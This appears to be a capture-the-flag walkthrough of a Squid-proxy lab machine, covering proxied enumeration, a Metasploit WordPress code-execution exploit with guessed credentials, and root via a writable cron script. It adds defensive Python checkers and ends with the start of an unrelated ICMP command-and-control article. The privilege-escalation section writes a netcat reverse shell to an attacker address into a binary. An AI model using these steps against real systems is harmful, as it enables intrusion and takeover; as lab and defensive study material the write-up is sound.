Security Level: Intermediate
Penetrating Methodology:
- Scanning
- Netdiscover
- NMAP
- Enumeration
- Dirbuster
- WPScan
- Exploitation
- Metasploit
- Privilege Escalation
- Exploiting Crontab
Scanning
[code]netdiscover[/code]

We used Nmap for port enumeration and found that only port 8080 is open, on which a Squid proxy is running, which means our target machine is a proxy server.

Enumeration
Since the target machine sits behind the proxy, direct enumeration techniques may not give the desired results. We tried Dirbuster through the proxy and found one directory, /server-status.

To set up a proxy in Dirbuster, go to Advanced Options, click on Http Options, check the Run through a Proxy box and enter the host IP and port number.

We got an HTTP 200 OK response for /server-status in its results.

So to access the URL 127.0.0.1/server-status in the browser, we first set up our proxy using FoxyProxy or directly in the browser settings.
We have done it here using the FoxyProxy plugin.

Then we accessed the URL and found that there is one more port open on the target machine, i.e. 1337.

After accessing the URL 127.0.0.1:1337, we again used Dirbuster for brute force and this time found a directory named /wordpress.

After accessing that URL we got a WordPress site, so we used WPScan through the proxy to look for vulnerabilities on it.

[code]wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.1.104:8080 -e u[/code]

In the scan results we found that the site has two WordPress admin users, root and Jerome.

We also learned that the site has a code execution vulnerability for which an exploit already exists in Metasploit.
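The weakness that made this enumeration possible is a forward proxy that relays requests to its own loopback interface (127.0.0.1/server-status and 127.0.0.1:1337 above). The following is an added example, not from the original write-up and not part of Squid itself: a small checker that reads the acl and http_access lines of a squid.conf and evaluates, with Squid's first-match semantics, whether a LAN client could reach loopback through the proxy. Both configuration fragments, the probe requests and the client address 192.168.1.50 are constructed; the checker only understands src, dst, port and all ACL types, which is enough for this question.

```python
import ipaddress

# Constructed squid.conf fragments for the check; neither is the lab's real configuration.
WEAK_CONF = """
acl localnet src 192.168.0.0/16
acl Safe_ports port 80 443 1337 8080
http_access deny !Safe_ports
http_access allow localnet
http_access deny all
"""

# Squid's sample squid.conf ships a to_localhost ACL for exactly this purpose.
HARDENED_CONF = """
acl localnet src 192.168.0.0/16
acl to_localhost dst 127.0.0.0/8 ::1
acl Safe_ports port 80 443
http_access deny !Safe_ports
http_access deny to_localhost
http_access allow localnet
http_access deny all
"""

# Constructed probe requests: a LAN client asking the proxy for various destinations.
PROBES = {
    "loopback_1337": {"src": "192.168.1.50", "dst": "127.0.0.1", "port": 1337},
    "loopback_80": {"src": "192.168.1.50", "dst": "127.0.0.1", "port": 80},
    "external_443": {"src": "192.168.1.50", "dst": "203.0.113.10", "port": 443},
}


def parse_squid_conf(text):
    """Collect 'acl' definitions and ordered 'http_access' rules; other directives are ignored."""
    acls = {"all": ("all", [])}
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "acl" and len(parts) >= 3:
            _acl_type, values = acls.setdefault(parts[1], (parts[2], []))
            values.extend(parts[3:])          # repeated acl lines accumulate, as in Squid
        elif parts[0] == "http_access" and len(parts) >= 2:
            rules.append((parts[1] == "allow", parts[2:]))
    return acls, rules


def _port_matches(values, port):
    for value in values:                      # single ports or "low-high" ranges
        low, _, high = value.partition("-")
        if int(low) <= port <= int(high or low):
            return True
    return False


def _acl_matches(acl, request):
    acl_type, values = acl
    if acl_type == "all":
        return True
    if acl_type in ("src", "dst"):
        address = ipaddress.ip_address(request[acl_type])
        return any(address in ipaddress.ip_network(v, strict=False) for v in values)
    if acl_type == "port":
        return _port_matches(values, request["port"])
    raise ValueError(f"acl type {acl_type!r} not supported by this checker")


def request_allowed(acls, rules, request):
    """First http_access line whose terms all match wins; with no match the opposite of the
    last line applies; with no lines at all Squid denies."""
    last_action = None
    for allow, terms in rules:
        last_action = allow
        for term in terms:
            negated = term.startswith("!")
            name = term.lstrip("!")
            if name not in acls:
                raise ValueError(f"undefined acl {name!r}")
            if _acl_matches(acls[name], request) == negated:
                break                         # this term fails, try the next rule
        else:
            return allow
    return (not last_action) if last_action is not None else False


def audit(conf_text):
    """Map each probe to True (proxy would forward it) or False (proxy would refuse)."""
    acls, rules = parse_squid_conf(conf_text)
    return {name: request_allowed(acls, rules, req) for name, req in PROBES.items()}


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf))
```

With the weak configuration every probe is forwarded, including the two to loopback; with the hardened one only the external request passes, because the deny to_localhost line sits before the allow localnet line (order matters in Squid).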

Exploitation:
We used the exploit in msf that our WPScan results pointed to.
Since this is an authenticated code execution exploit, we had to supply credentials; we tried jerome as both username and password, which turned out to be correct, and we got a Meterpreter shell.
[code]use exploit/multi/http/wp_crop_rce
set rhosts 127.0.0.1
set proxies http:192.168.1.104:8080
set username jerome
set password jerome
set targeturi /wordpress
set rport 1337
set ReverseAllowProxy true
set lhost 192.168.1.105
exploit[/code]

We looked into the /home/Jerome directory and got our first flag.
Now it was time to get a root shell and grab the final flag. We looked around for something useful and, in the process, checked the crontab file and found one script, simulate.sh, scheduled to run after every reboot.
The simulate.sh file runs three commands: cd, ls and sleep.

Privilege Escalation:
To elevate to a root shell, we edited the ls that simulate.sh invokes, appending a netcat reverse shell to it:
[code]shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo "nc -e /bin/bash 192.168.1.105 1234" >> ls
chmod 777 ls[/code]

On our Kali machine we started an nc listener on the same port, and after rebooting the target system we got a root shell and finally the root flag.
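The root-level cron job above was exploitable because the script it ran could be modified by an unprivileged user and invoked commands by bare name rather than absolute path. Here is an added example, not from the original write-up, of the check an administrator would run against /etc/crontab-style entries: it parses the crontab, and for every job run as root it reports a cron PATH containing the current directory, a job command that is not an absolute path, a target script writable by group or others, and any command inside a shell script that is resolved through PATH. The crontab text, the simulate.sh and rotate.sh contents and the temporary directory are constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# Shell builtins never resolve through PATH, so they are not reported.
SHELL_BUILTINS = {"cd", "export", "set", "exit", "echo", "source", ".", "umask"}


def parse_system_crontab(text):
    """Return (env, jobs) from /etc/crontab-style text; each job is (schedule, user, command)."""
    env, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):      # e.g. PATH=... or SHELL=...
            key, _, value = line.partition("=")
            env[key] = value.strip().strip('"')
            continue
        if line.startswith("@"):                              # @reboot user command
            parts = line.split(None, 2)
            sched, rest = parts[0], parts[1:]
        else:                                                 # m h dom mon dow user command
            parts = line.split(None, 6)
            sched, rest = " ".join(parts[:5]), parts[5:]
        if len(rest) == 2:
            jobs.append((sched, rest[0], rest[1]))
    return env, jobs


def writable_by_others(path):
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def commands_without_absolute_path(script_path):
    """(line number, command) for each command in a shell script that relies on PATH lookup."""
    with open(script_path, "rb") as fh:
        if fh.read(2) != b"#!":                               # not a script, nothing to scan
            return []
    bare = []
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        for lineno, raw in enumerate(fh, 1):
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            first = line.split()[0]
            if "/" not in first and first not in SHELL_BUILTINS:
                bare.append((lineno, first))
    return bare


def audit_crontab(text):
    """Map each root job ('schedule command') to its findings; an empty list means nothing to report."""
    env, jobs = parse_system_crontab(text)
    path_entries = env.get("PATH", "").split(":")
    report = {}
    for sched, user, command in jobs:
        if user != "root":
            continue
        target = command.split()[0]
        findings = []
        if "." in path_entries or "" in path_entries:
            findings.append("cron PATH contains the current directory")
        if not target.startswith("/"):
            findings.append("job command is not an absolute path")
        elif not os.path.exists(target):
            findings.append("job target does not exist")
        else:
            if writable_by_others(target):
                findings.append("script is writable by group or others")
            for lineno, cmd in commands_without_absolute_path(target):
                findings.append(f"line {lineno}: '{cmd}' resolved via PATH")
        report[f"{sched} {command}"] = findings
    return report


def run_demo():
    """Build a constructed lab layout in a temp dir and audit a constructed crontab."""
    workdir = tempfile.mkdtemp()
    risky = os.path.join(workdir, "simulate.sh")
    with open(risky, "w") as fh:
        fh.write("#!/bin/bash\ncd /home/jerome\nls\nsleep 30\n")
    os.chmod(risky, 0o777)            # writable by everyone: the weakness this check looks for
    safe = os.path.join(workdir, "rotate.sh")
    with open(safe, "w") as fh:
        fh.write("#!/bin/bash\n/usr/bin/find /var/tmp -mtime +7 -delete\n")
    os.chmod(safe, 0o755)
    crontab = (
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin\n"
        f"@reboot root {risky}\n"
        f"0 3 * * * root {safe}\n"
        f"*/5 * * * * jerome {risky}\n"   # not root, so not reported
    )
    report = audit_crontab(crontab)
    return {os.path.basename(key.split()[-1]): value for key, value in report.items()}


if __name__ == "__main__":
    for script, findings in run_demo().items():
        print(script, findings or ["ok"])
```

The fix that the findings point at is the usual one: root-owned scripts with mode 0755 or stricter, and every command in them called by its full path (or an explicit PATH set at the top of the script).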

In this article you will learn about the red-team operation of data exfiltration via ICMP C2 and ICMP tunneling. Both approaches are useful for circumventing firewall rules because they hide the channel inside ICMP traffic, which firewalls commonly permit and which does not look like an ordinary reverse connection.
Table of Contents
Brief Summary on working of ICMP Protocol
Command & Control via ICMP Protocol
- Requirement
- icmpsh: C2-channel & Its Installation
- Run icmpsh as Master
- Run icmpsh as Slave
- Requirement
- Configure ICMP over Server Machine (Target)
- Configure ICMP tunnel over Client Machine (Intruder)
- Connect SSH Over ICMP
ICMP packet at Network layer

IP header    ICMP header    ICMP payload size
20 bytes     8 bytes        1472 bytes

Total: 20 + 8 + 1472 = 1500 bytes (the standard Ethernet MTU)
A ping command sends an ICMP echo request to the target host. The target host responds with an echo reply, which means the target host is alive.
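The table and the ping description above are what a detection engineer works from: an echo request carries an 8-byte ICMP header and can carry up to 1472 bytes of payload, while a stock ping carries a small, fixed pattern (Linux ping sends an 8-byte timestamp followed by the bytes 0x10, 0x11, ...; Windows ping sends the 32-byte string "abcdefghijklmnopqrstuvwabcdefghi"). The following is an added example, not from the original article and not part of icmpsh: it builds constructed IPv4+ICMP echo packets, parses the header fields and verifies the ICMP checksum, and flags echo payloads that an ICMP shell would produce, namely payloads larger than a stock ping or consisting mostly of printable text. The source and destination addresses in the constructed packets are the lab addresses listed in the Requirement section; the IP header checksum is left at zero because nothing here depends on it.

```python
import struct

IP_HEADER_LEN = 20            # IPv4 header without options
ICMP_HEADER_LEN = 8           # type, code, checksum, identifier, sequence
MTU = 1500
MAX_ICMP_PAYLOAD = MTU - IP_HEADER_LEN - ICMP_HEADER_LEN     # 1472, as in the table above

LINUX_PING_DATA = bytes(range(0x10, 0x40))                   # follows an 8-byte timestamp
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"      # Windows default, 32 bytes


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum; yields 0 over a packet whose checksum field is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(payload: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """Constructed test input: IPv4 header (20 bytes) + ICMP echo request (8 bytes) + payload."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", icmp_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HEADER_LEN + len(icmp), 0, 0, 64, 1, 0,
                     bytes([192, 168, 1, 106]), bytes([192, 168, 1, 108]))
    return ip + icmp


def parse_icmp(packet: bytes) -> dict:
    """Split an IPv4 packet into the ICMP header fields and payload; checksum_ok covers the ICMP part."""
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1:
        raise ValueError("not an ICMP packet")
    icmp = packet[ihl:]
    typ, code, _chk, ident, seq = struct.unpack("!BBHHH", icmp[:ICMP_HEADER_LEN])
    return {
        "ip_header_len": ihl,
        "type": typ, "code": code, "id": ident, "seq": seq,
        "payload": icmp[ICMP_HEADER_LEN:],
        "checksum_ok": icmp_checksum(icmp) == 0,
    }


def looks_like_stock_ping(payload: bytes) -> bool:
    if payload == WINDOWS_PING_DATA:
        return True
    body = payload[8:]                      # Linux: skip the timeval, then expect 0x10, 0x11, ...
    return len(body) > 0 and body == LINUX_PING_DATA[:len(body)]


def suspicious_indicators(packet: bytes) -> list:
    """Findings for one echo packet; an empty list means it looks like an ordinary ping."""
    info = parse_icmp(packet)
    payload = info["payload"]
    findings = []
    if not info["checksum_ok"]:
        findings.append("bad checksum")
    if info["type"] not in (0, 8) or looks_like_stock_ping(payload):
        return findings
    if len(payload) > 64:
        findings.append(f"payload {len(payload)} bytes, larger than a stock ping")
    printable = sum(1 for b in payload if 0x20 <= b < 0x7F or b in b"\r\n\t")
    if payload and printable / len(payload) >= 0.9:
        findings.append("payload is mostly printable text")
    if not findings:
        findings.append("non-standard echo payload")
    return findings


if __name__ == "__main__":
    samples = {
        "linux ping": b"\x00" * 8 + LINUX_PING_DATA,
        "windows ping": WINDOWS_PING_DATA,
        "shell output": b"uid=1000(jerome) gid=1000(jerome) groups=1000(jerome)\n",
        "bulk transfer": bytes(range(256)) * 4,
    }
    for label, data in samples.items():
        print(label, suspicious_indicators(build_echo_request(data)) or ["looks like ping"])
```

The two payload checks are deliberately crude; in production the same logic runs per host over time, so that the rate of echo requests and the byte volume they carry can be compared against a baseline rather than judged one packet at a time.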
Read more from here
Command & Control via ICMP Protocol
In many of our previous publications we have discussed C2 channels, also known as command and control, so you can read about them there. In this article you will learn how to use the ICMP protocol as a command and control channel.
The contest between intruders and security researchers never stops, so we need a backup plan. As we all know, companies have become smarter: they know that this type of attack is detected once a TCP reverse connection to the machine is achieved.
Thus we turn to a covert ICMP shell and use icmpsh as the command and control tool.
REQUIREMENT
- Attacker machine or C2 channel: 192.168.1.108 (Kali Linux)
- Host machine: 192.168.1.106 (Windows 10)
icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX-compatible master in C, Perl or Python. Its main advantage over similar open-source tools is that it does not require administrative privileges to run on the target machine.
The tool is clean, easy and portable. The slave (client) runs on the target Windows machine; it is written in C and works on Windows only, whereas the master (server) can run on any platform on the attacker machine, as it was implemented in C and Perl by Nico Leidecker and later also ported to Python.
It is very easy to install and use as a C2 channel. On the attacker machine, download icmpsh from GitHub:
[code]git clone https://github.com/inquisb/icmpsh.git[/code]